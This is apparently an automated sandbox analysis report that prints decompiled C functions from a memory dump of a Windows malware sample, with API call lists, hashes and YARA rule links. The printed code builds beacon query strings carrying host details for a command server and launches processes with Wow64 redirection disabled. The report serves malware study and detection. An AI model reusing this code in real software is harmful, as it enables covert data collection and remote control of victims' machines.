						_t7 = _t92 + 0x137b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E01372956(_t99);
					_t44 =  *0x137a2d0; // 0x666d5a8
					_t9 = _t44 + 0x137b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x137a2d0; // 0x666d5a8
					_t11 = _t48 + 0x137b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x137a328; // 0x79e95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x137a2d0; // 0x666d5a8
						_t13 = _t88 + 0x137b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x137a37c; // 0x79e9630
					_a28 = E01375741(0x137a00a, _t105 + 4);
					_t55 =  *0x137a318; // 0x79e95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x137a2d0; // 0x666d5a8
						_t16 = _t84 + 0x137b8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x137a314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x137a2d0; // 0x666d5a8
						_t18 = _t81 + 0x137b8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x137a290, _t107, 0x800);
						if(_t98 != _t107) {
							E01371A51(GetTickCount());
							_t62 =  *0x137a37c; // 0x79e9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x137a37c; // 0x79e9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x137a37c; // 0x79e9630
							_t115 = E01375AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x13792cc);
								_push(_t115);
								_t108 = E01372829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E01373B46(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E01372813();
									}
									HeapFree( *0x137a290, 0, _v24);
								}
								HeapFree( *0x137a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x137a290, _t107, _t98);
						}
						HeapFree( *0x137a290, _t107, _a20);
					}
					HeapFree( *0x137a290, _t107, _t117);
				}
				return _v16;
			}

0x01376124
0x01376138
0x0137613a
0x01376148
0x0137614c
0x01376154
0x0137615c
0x0137615c
0x0137615e
0x0137616a
0x01376179
0x0137617e
0x01376181
0x01376186
0x01376189
0x0137618e
0x01376191
0x0137619d
0x013761aa
0x013761ac
0x013761b2
0x013761b7
0x013761c2
0x013761c4
0x013761c7
0x013761cd
0x013761cf
0x013761d8
0x013761e3
0x013761e5
0x013761e8
0x013761e8
0x013761ea
0x013761f1
0x013761f6
0x01376203
0x01376205
0x0137620a
0x01376218
0x0137621a
0x0137621f
0x01376224
0x01376227
0x0137622c
0x01376237
0x01376239
0x0137623c
0x0137623c
0x0137623e
0x01376251
0x01376255
0x0137625a
0x0137625e
0x01376261
0x01376266
0x01376271
0x01376273
0x01376276
0x01376276
0x01376278
0x0137627f
0x01376282
0x01376287
0x01376291
0x01376293
0x0137629a
0x013762b2
0x013762b6
0x013762c2
0x013762c7
0x013762d0
0x013762e1
0x013762e5
0x013762ee
0x013762f4
0x01376301
0x0137630e
0x01376314
0x0137631c
0x01376322
0x01376328
0x0137632c
0x01376330
0x01376336
0x0137633a
0x01376341
0x01376348
0x0137634c
0x01376357
0x0137635e
0x01376362
0x0137636b
0x0137636b
0x0137637c
0x0137637c
0x0137638b
0x01376391
0x01376391
0x0137639b
0x0137639b
0x013763ac
0x013763ac
0x013763ba
0x013763ba
0x013763ca

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 01376142
GetTickCount.KERNEL32 ref: 01376156
wsprintfA.USER32 ref: 013761A5
wsprintfA.USER32 ref: 013761C2
wsprintfA.USER32 ref: 013761E3
wsprintfA.USER32 ref: 01376201
wsprintfA.USER32 ref: 01376216
wsprintfA.USER32 ref: 01376237
wsprintfA.USER32 ref: 01376271
wsprintfA.USER32 ref: 01376291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013762AC
GetTickCount.KERNEL32 ref: 013762BC
RtlEnterCriticalSection.NTDLL(079E95F0), ref: 013762D0
RtlLeaveCriticalSection.NTDLL(079E95F0), ref: 013762EE

Part of subcall function 01375AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01376301,00000000,079E9630), ref: 01375B0E
Part of subcall function 01375AE3: lstrlen.KERNEL32(00000000,?,00000000,01376301,00000000,079E9630), ref: 01375B16
Part of subcall function 01375AE3: strcpy.NTDLL ref: 01375B2D
Part of subcall function 01375AE3: lstrcat.KERNEL32(00000000,00000000), ref: 01375B38
Part of subcall function 01375AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01376301,?,00000000,01376301,00000000,079E9630), ref: 01375B55

StrTrimA.SHLWAPI(00000000,013792CC,00000000,079E9630), ref: 0137631C

Part of subcall function 01372829: lstrlen.KERNEL32(079E887A,00000000,00000000,00000000,01376328,00000000), ref: 01372839
Part of subcall function 01372829: lstrlen.KERNEL32(?), ref: 01372841
Part of subcall function 01372829: lstrcpy.KERNEL32(00000000,079E887A), ref: 01372855
Part of subcall function 01372829: lstrcat.KERNEL32(00000000,?), ref: 01372860

lstrcpy.KERNEL32(00000000,?), ref: 0137633A
lstrcat.KERNEL32(00000000,00000000), ref: 01376348
lstrcat.KERNEL32(00000000,00000000), ref: 0137634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0137637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0137638B
HeapFree.KERNEL32(00000000,00000000,00000000,079E9630), ref: 0137639B
HeapFree.KERNEL32(00000000,?), ref: 013763AC
HeapFree.KERNEL32(00000000,00000000), ref: 013763BA

Strings

Ut, xrefs: 0137637C, 0137638B, 0137639B, 013763AC, 013763BA

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: Ut
API String ID: 1837416118-8415677
Opcode ID: 9cd7be2cd95b1ccbc7d0338c9a8c38c06cba6ce4479089faaf60a5a5ca3b063a
Instruction ID: bb452e64a16249d9bcff96abef07f8deac2d3e3f389432f15b6932dd5828504c
Opcode Fuzzy Hash: 9cd7be2cd95b1ccbc7d0338c9a8c38c06cba6ce4479089faaf60a5a5ca3b063a
Instruction Fuzzy Hash: 17718DB1504214AFE732DF68EC88E5B7BECFB88324F190515F949D3259DA3AA805DF60

Uniqueness

Uniqueness Score: -1.00%

Function 01376DB7, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 263
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E01376DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t112;
				signed int _t116;
				char** _t118;
				int _t121;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t133;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t140;
				int _t143;
				void* _t144;
				void* _t145;
				void* _t155;
				int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				void* _t164;
				long _t168;
				intOrPtr* _t169;
				intOrPtr* _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t181;

				_t155 = __edx;
				_t145 = __ecx;
				_t63 = __eax;
				_t144 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x137a018; // 0xa6c26295
				asm("bswap eax");
				_t65 =  *0x137a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x137a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x137a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x137a2d0; // 0x666d5a8
				_t3 = _t68 + 0x137b622; // 0x74666f73
				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0x137a02c,  *0x137a004, _t63);
				_t71 = E0137271A();
				_t72 =  *0x137a2d0; // 0x666d5a8
				_t4 = _t72 + 0x137b662; // 0x74707526
				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
				_t175 = _t173 + 0x38;
				_t159 = _t158 + _t75;
				if(_a8 != 0) {
					_t140 =  *0x137a2d0; // 0x666d5a8
					_t8 = _t140 + 0x137b66d; // 0x732526
					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
					_t175 = _t175 + 0xc;
					_t159 = _t159 + _t143;
				}
				_t76 = E01372956(_t145);
				_t77 =  *0x137a2d0; // 0x666d5a8
				_t10 = _t77 + 0x137b38a; // 0x6d697426
				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
				_t81 =  *0x137a2d0; // 0x666d5a8
				_t12 = _t81 + 0x137b7b4; // 0x79e8d5c
				_t181 = _a4 - _t12;
				_t14 = _t81 + 0x137b33b; // 0x74636126
				_t157 = 0 | _t181 == 0x00000000;
				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
				_t85 =  *0x137a318; // 0x79e95e0
				_t176 = _t175 + 0x1c;
				if(_t85 != 0) {
					_t136 =  *0x137a2d0; // 0x666d5a8
					_t18 = _t136 + 0x137b8ea; // 0x3d736f26
					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
					_t176 = _t176 + 0xc;
					_t161 = _t161 + _t139;
				}
				_t86 =  *0x137a328; // 0x79e95b0
				if(_t86 != 0) {
					_t133 =  *0x137a2d0; // 0x666d5a8
					_t20 = _t133 + 0x137b685; // 0x73797326
					wsprintfA(_t161 + _t144, _t20, _t86);
					_t176 = _t176 + 0xc;
				}
				_t162 =  *0x137a37c; // 0x79e9630
				_t88 = E01375741(0x137a00a, _t162 + 4);
				_t168 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x137a290, _t168, _t144);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x137a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x137a290, _t168, _v12);
						goto L28;
					}
					E01371A51(GetTickCount());
					_t95 =  *0x137a37c; // 0x79e9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x137a37c; // 0x79e9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x137a37c; // 0x79e9630
					_t164 = E01375AE3(1, _t157, _t144,  *_t101);
					_v20 = _t164;
					asm("lock xadd [eax], ecx");
					if(_t164 == 0) {
						L26:
						HeapFree( *0x137a290, _t168, _a8);
						goto L27;
					}
					StrTrimA(_t164, 0x13792cc);
					_push(_t164);
					_t107 = E01372829();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x137a290, _t168, _t164);
						goto L26;
					}
					 *_t164 = 0;
					__imp__(_a8, _v12);
					_t169 = __imp__;
					 *_t169(_a8, _v8);
					 *_t169(_a8, _t164);
					_t112 = E013733FA(0, _a8);
					_a4 = _t112;
					if(_t112 == 0) {
						_a20 = 8;
						L23:
						E01372813();
						L24:
						HeapFree( *0x137a290, 0, _v8);
						_t168 = 0;
						goto L25;
					}
					_t116 = E01375C63(_t144, 0xffffffffffffffff, _t164,  &_v16);
					_a20 = _t116;
					if(_t116 == 0) {
						_t172 = _v16;
						_a20 = E01371671(_t172, _a4, _a12, _a16);
						_t124 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
						_t126 =  *((intOrPtr*)(_t172 + 8));
						 *((intOrPtr*)( *_t126 + 8))(_t126);
						_t128 =  *((intOrPtr*)(_t172 + 4));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *_t172;
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						E01372A03(_t172);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t118 = _a12;
							if(_t118 != 0) {
								_t165 =  *_t118;
								_t170 =  *_a16;
								wcstombs( *_t118,  *_t118,  *_a16);
								_t121 = E01376459(_t165, _t165, _t170 >> 1);
								_t164 = _v20;
								 *_a16 = _t121;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E01372A03(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x01376db7
0x01376db7
0x01376db7
0x01376dc0
0x01376dc5
0x01376dcc
0x01376dce
0x01376dce
0x01376ddb
0x01376de6
0x01376de9
0x01376df4
0x01376df7
0x01376dfc
0x01376dff
0x01376e04
0x01376e07
0x01376e13
0x01376e20
0x01376e22
0x01376e28
0x01376e2d
0x01376e38
0x01376e3a
0x01376e3d
0x01376e43
0x01376e45
0x01376e4d
0x01376e58
0x01376e5a
0x01376e5d
0x01376e5d
0x01376e5f
0x01376e66
0x01376e6b
0x01376e78
0x01376e7a
0x01376e7f
0x01376e87
0x01376e8a
0x01376e90
0x01376e9b
0x01376e9d
0x01376ea2
0x01376ea7
0x01376eaa
0x01376eaf
0x01376eba
0x01376ebc
0x01376ebf
0x01376ebf
0x01376ec1
0x01376ec8
0x01376ecb
0x01376ed0
0x01376eda
0x01376edc
0x01376edc
0x01376edf
0x01376eed
0x01376ef2
0x01376ef6
0x01376ef9
0x013770c5
0x013770cd
0x013770da
0x01376eff
0x01376f0b
0x01376f13
0x01376f16
0x013770b5
0x013770bf
0x00000000
0x013770bf
0x01376f22
0x01376f27
0x01376f30
0x01376f41
0x01376f45
0x01376f4e
0x01376f54
0x01376f61
0x01376f68
0x01376f71
0x01376f77
0x013770a5
0x013770af
0x00000000
0x013770af
0x01376f83
0x01376f89
0x01376f8a
0x01376f91
0x01376f94
0x01377097
0x0137709f
0x00000000
0x0137709f
0x01376f9d
0x01376fa3
0x01376fac
0x01376fb5
0x01376fbb
0x01376fc2
0x01376fc9
0x01376fcc
0x013770dd
0x0137707f
0x0137707f
0x01377084
0x0137708f
0x01377095
0x00000000
0x01377095
0x01376fd6
0x01376fdd
0x01376fe0
0x01376fe5
0x01376ff5
0x01376ff8
0x01376ffe
0x01377004
0x0137700a
0x0137700d
0x01377013
0x01377016
0x0137701b
0x0137701f
0x0137701f
0x0137702b
0x01377037
0x0137703b
0x0137703d
0x01377042
0x01377044
0x01377049
0x0137704e
0x0137705b
0x01377063
0x01377066
0x01377066
0x01377042
0x00000000
0x0137702d
0x01377031
0x01377068
0x0137706b
0x01377074
0x00000000
0x00000000
0x00000000
0x00000000
0x01377074
0x01377033
0x00000000
0x01377033
0x0137702b

APIs

GetTickCount.KERNEL32 ref: 01376DCE
wsprintfA.USER32 ref: 01376E1B
wsprintfA.USER32 ref: 01376E38
wsprintfA.USER32 ref: 01376E58
wsprintfA.USER32 ref: 01376E76
wsprintfA.USER32 ref: 01376E99
wsprintfA.USER32 ref: 01376EBA
wsprintfA.USER32 ref: 01376EDA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01376F0B
GetTickCount.KERNEL32 ref: 01376F1C
RtlEnterCriticalSection.NTDLL(079E95F0), ref: 01376F30
RtlLeaveCriticalSection.NTDLL(079E95F0), ref: 01376F4E

Part of subcall function 01375AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01376301,00000000,079E9630), ref: 01375B0E
Part of subcall function 01375AE3: lstrlen.KERNEL32(00000000,?,00000000,01376301,00000000,079E9630), ref: 01375B16
Part of subcall function 01375AE3: strcpy.NTDLL ref: 01375B2D
Part of subcall function 01375AE3: lstrcat.KERNEL32(00000000,00000000), ref: 01375B38
Part of subcall function 01375AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01376301,?,00000000,01376301,00000000,079E9630), ref: 01375B55

StrTrimA.SHLWAPI(00000000,013792CC,?,079E9630), ref: 01376F83

Part of subcall function 01372829: lstrlen.KERNEL32(079E887A,00000000,00000000,00000000,01376328,00000000), ref: 01372839
Part of subcall function 01372829: lstrlen.KERNEL32(?), ref: 01372841
Part of subcall function 01372829: lstrcpy.KERNEL32(00000000,079E887A), ref: 01372855
Part of subcall function 01372829: lstrcat.KERNEL32(00000000,?), ref: 01372860

lstrcpy.KERNEL32(00000000,?), ref: 01376FA3
lstrcat.KERNEL32(00000000,?), ref: 01376FB5
lstrcat.KERNEL32(00000000,00000000), ref: 01376FBB

Part of subcall function 013733FA: lstrlen.KERNEL32(?,0137A380,74E47FC0,00000000,01372788,?,?,?,?,?,01373EAC,?), ref: 01373403
Part of subcall function 013733FA: mbstowcs.NTDLL ref: 0137342A
Part of subcall function 013733FA: memset.NTDLL ref: 0137343C

wcstombs.NTDLL ref: 0137704E

Part of subcall function 01371671: SysAllocString.OLEAUT32(00000000), ref: 013716B2

Part of subcall function 01372A03: HeapFree.KERNEL32(00000000,00000000,01374072,00000000,?,?,00000000,?,?,?,?,?,?,013744AE,00000000), ref: 01372A0F

HeapFree.KERNEL32(00000000,?,00000000), ref: 0137708F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0137709F
HeapFree.KERNEL32(00000000,00000000,?,079E9630), ref: 013770AF
HeapFree.KERNEL32(00000000,?), ref: 013770BF
HeapFree.KERNEL32(00000000,?), ref: 013770CD

Strings

Ut, xrefs: 0137708F, 0137709F, 013770AF, 013770BF, 013770CD

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 972889839-8415677
Opcode ID: c4493313ca6050812ba8e54db6394179bf1453e11c295262a6446544df979bdc
Instruction ID: ab816526df62a5d67a8fdb2c765cf30fb0d7af7283238b6915e85ebde2bcc338
Opcode Fuzzy Hash: c4493313ca6050812ba8e54db6394179bf1453e11c295262a6446544df979bdc
Instruction Fuzzy Hash: 07A15671900219AFDB32DF68DC88A9A3BADFF48368F184025F909D7254DB399954DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01377836, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E01377836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E013771A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E01377973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x137a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x137a2d0; // 0x666d5a8
					_t18 = _t50 + 0x137b55b; // 0x73797325
					_t52 = E01371000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x137a2d0; // 0x666d5a8
						_t20 = _t53 + 0x137b73d; // 0x79e8ce5
						_t21 = _t53 + 0x137b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x137a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E01372A03(_t76);
				goto L12;
			}

0x0137783f
0x0137783f
0x0137784d
0x01377856
0x01377859
0x0137796b
0x01377972
0x01377972
0x01377868
0x01377870
0x01377875
0x01377878
0x0137788d
0x01377893
0x01377894
0x01377897
0x0137789d
0x013778a0
0x013778a5
0x013778ad
0x013778b4
0x013778bb
0x013778be
0x01377952
0x013778c4
0x013778c4
0x013778c9
0x013778d0
0x013778e4
0x013778e8
0x01377939
0x013778ea
0x013778ea
0x013778f1
0x013778f8
0x01377910
0x01377916
0x0137791a
0x01377934
0x0137791c
0x01377925
0x0137792a
0x0137792a
0x0137791a
0x0137794a
0x0137794a
0x013778be
0x01377959
0x01377962
0x01377966
0x00000000

APIs

Part of subcall function 013771A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,01377852,?,?,?,?,00000000,00000000), ref: 013771C8
Part of subcall function 013771A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 013771EA
Part of subcall function 013771A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01377200
Part of subcall function 013771A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01377216
Part of subcall function 013771A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0137722C
Part of subcall function 013771A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01377242

memset.NTDLL ref: 013778A0

Part of subcall function 01371000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,01374F1C,73797325), ref: 01371011
Part of subcall function 01371000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0137102B

GetModuleHandleA.KERNEL32(4E52454B,079E8CE5,73797325), ref: 013778D7
GetProcAddress.KERNEL32(00000000), ref: 013778DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 013778F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 01377916
CloseHandle.KERNEL32(00000000), ref: 01377925
CloseHandle.KERNEL32(?), ref: 0137792A
GetLastError.KERNEL32 ref: 0137792E
HeapFree.KERNEL32(00000000,?), ref: 0137794A

Strings

Ut, xrefs: 0137794A

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: Ut
API String ID: 91923200-8415677
Opcode ID: 20a38ca5302fb4879008f6dc9f3dd00980b2545a20229d605f018e2f92e87cc2
Instruction ID: 965d5a3f65864b7c9319b750b4e240fc6307af7aaa059abe6d141652038c6144
Opcode Fuzzy Hash: 20a38ca5302fb4879008f6dc9f3dd00980b2545a20229d605f018e2f92e87cc2
Instruction Fuzzy Hash: 48315971901219EFDB32AFA8D848ADEBFBDFF09358F104055E605E3154D775AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0137762C, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0137762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x137a38c; // 0x79e9cd8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E01375F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x13791cc;
				}
				_t46 = E013743FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E01375C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x137a2d0; // 0x666d5a8
						_t16 = _t75 + 0x137bad8; // 0x530025
						 *0x137a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E01375F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x13791d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E01375C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E01372A03(_v20);
						} else {
							_t66 =  *0x137a2d0; // 0x666d5a8
							_t31 = _t66 + 0x137bbf8; // 0x73006d
							 *0x137a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E01372A03(_v12);
				}
				return _v24;
			}

0x01377634
0x0137763a
0x01377641
0x01377647
0x0137764b
0x0137764f
0x01377652
0x01377659
0x0137765c
0x0137765e
0x0137765e
0x01377667
0x0137766e
0x01377671
0x01377677
0x01377681
0x0137768a
0x01377691
0x013776aa
0x013776b1
0x013776b4
0x013776bd
0x013776c6
0x013776d7
0x013776e0
0x013776e4
0x013776e8
0x013776ef
0x013776f2
0x013776f4
0x013776f4
0x013776fe
0x01377707
0x0137770e
0x01377726
0x0137772a
0x01377767
0x0137772c
0x0137772f
0x01377737
0x01377748
0x01377754
0x0137775c
0x01377760
0x01377760
0x0137772a
0x0137776f
0x01377774
0x0137777b

APIs

GetTickCount.KERNEL32 ref: 01377641
lstrlen.KERNEL32(?,80000002,00000005), ref: 01377681
lstrlen.KERNEL32(00000000), ref: 0137768A
lstrlen.KERNEL32(00000000), ref: 01377691
lstrlenW.KERNEL32(80000002), ref: 0137769E
lstrlen.KERNEL32(?,00000004), ref: 013776FE
lstrlen.KERNEL32(?), ref: 01377707
lstrlen.KERNEL32(?), ref: 0137770E
lstrlenW.KERNEL32(?), ref: 01377715

Part of subcall function 01372A03: HeapFree.KERNEL32(00000000,00000000,01374072,00000000,?,?,00000000,?,?,?,?,?,?,013744AE,00000000), ref: 01372A0F

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
